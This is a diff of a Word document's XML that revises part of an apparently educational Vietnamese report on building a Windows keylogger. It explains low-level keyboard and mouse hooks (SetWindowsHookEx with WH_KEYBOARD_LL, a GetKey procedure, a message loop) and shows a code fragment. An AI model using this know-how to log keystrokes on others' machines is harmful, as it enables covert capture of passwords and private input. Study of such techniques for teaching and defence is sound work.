+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>UnhookWindowsHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(hKeyHook);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 0;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
       </w:r>
     </w:p>
     <w:p>
@@ -14127,8 +16840,350 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t>– CallNextHookEx: chuyển quyền điều khiển cùng các thông tin hook cho hook procedure kế tiếp trong hook chain. Ta có thể không sử dụng hàm này tuy nhiên chỉ sử dụng khi ta muốn chặn các hook procedure còn lại trong hook chain.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>– UnhookWindowsHookEx: gỡ hook procedure ra khỏi hook chain được cài đặt bởi SetWindowsHookEx.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Trước tiên, ta khởi tạo một hàm WinMain(). Hàm WinMain() có những tham số sau:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>- Giá trị đối số hInstanc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>e:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Quản lý việc thực thi của chương trình, nó quản lý tài nguyên của chương trình đang cài đặt, cụ thể là file .exe trong hệ thống</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Giá trị hPrevInstance</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>: Con trỏ trỏ đến việc thực thi trước đó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>và luôn luôn là 0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>- Giá trị szCmdLine: Dòng lệnh cho ứng dụng, ngoại trừ tên chương trình</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- Giá trị nShowCmd: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1 số nguyên để cung cấp cho hàm ShowWindow() (Không quan trọng).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Trong hàm WinMain(), ta khởi tạo một hook procedure vào một hook chain bằng hàm SetWindowsHookEx(). Hàm này có các đối số:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>- idHook: Loại thủ tục hook sẽ được cài đặt. Trong trường hợp này nó là macro WH_KEYBOARD_LL: Cài đặt một thủ tục giám sát các sự kiện nhập bàn phím.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>- (HOOKPROC)GetKey: Một con trỏ trỏ đến thủ tục hook. Trong trường hợp này ta đã tạo thủ tục GetKey trong file Keylogger.h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Một tham số </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HINSTANCE: Một xử lý tới DLL chứa thủ tục hook được tham số </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(HOOKPROC)GetKey </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">trỏ tới. Tham số </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>này</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> phải được đặt thành NULL nếu tham </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>– CallNextHookEx: chuyển quyền điều khiển cùng các thông tin hook cho hook procedure kế tiếp trong hook chain. Ta có thể không sử dụng hàm này tuy nhiên chỉ sử dụng khi ta muốn chặn các hook procedure còn lại trong hook chain.</w:t>
+        <w:t>số dwThreadId chỉ định một luồng được tạo bởi quy trình hiện tại và nếu thủ tục hook nằm trong mã được liên kết với quy trình hiện tại</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Trong trường hợp này, dwThreadId trả về giá trị là 0, tham số này được đặt là GetModuleHandle(NULL) trả về một handle cho tệp được sử dụng để tạo quá trình gọi.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14147,7 +17202,39 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>– UnhookWindowsHookEx: gỡ hook procedure ra khỏi hook chain được cài đặt bởi SetWindowsHookEx.</w:t>
+        <w:t xml:space="preserve">- dwThreadId: Định danh của luồng mà thủ tục hook được liên kết với. Đối với các ứng dụng dành cho </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>PC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, nếu tham số này bằng 0 thì quy trình hook được liên kết với tất cả các chuỗi hiện có đang chạy trong cùng một </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>PC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> như chuỗi gọi.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14166,7 +17253,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Trước tiên, ta khởi tạo một hàm WinMain(). Hàm WinMain() có những tham số sau:</w:t>
+        <w:t>Tương tự đối với một Mouse Hook Procedure</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14185,31 +17280,58 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>- Giá trị đối số hInstanc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>e:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Quản lý việc thực thi của chương trình, nó quản lý tài nguyên của chương trình đang cài đặt, cụ thể là file .exe trong hệ thống</w:t>
+        <w:t>Tiếp theo ta tạo một vòng lặp message.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sau khi mọi thứ ở trên được khởi tạo, vòng lặp Message sẽ “bắt” các thông tin </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>người dùng thực hiện với</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> window</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> và thực hiện nó</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14236,381 +17358,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Giá trị hPrevInstance</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>: Con trỏ trỏ đến việc thực thi trước đó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>và luôn luôn là 0.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>- Giá trị szCmdLine: Dòng lệnh cho ứng dụng, ngoại trừ tên chương trình</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Giá trị nShowCmd: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>1 số nguyên để cung cấp cho hàm ShowWindow() (Không quan trọng).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Trong hàm WinMain(), ta khởi tạo một hook procedure vào một hook chain bằng hàm SetWindowsHookEx(). Hàm này có các đối số:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>- idHook: Loại thủ tục hook sẽ được cài đặt. Trong trường hợp này nó là macro WH_KEYBOARD_LL: Cài đặt một thủ tục giám sát các sự kiện nhập bàn phím.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>- (HOOKPROC)GetKey: Một con trỏ trỏ đến thủ tục hook. Trong trường hợp này ta đã tạo thủ tục GetKey trong file Keylogger.h</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
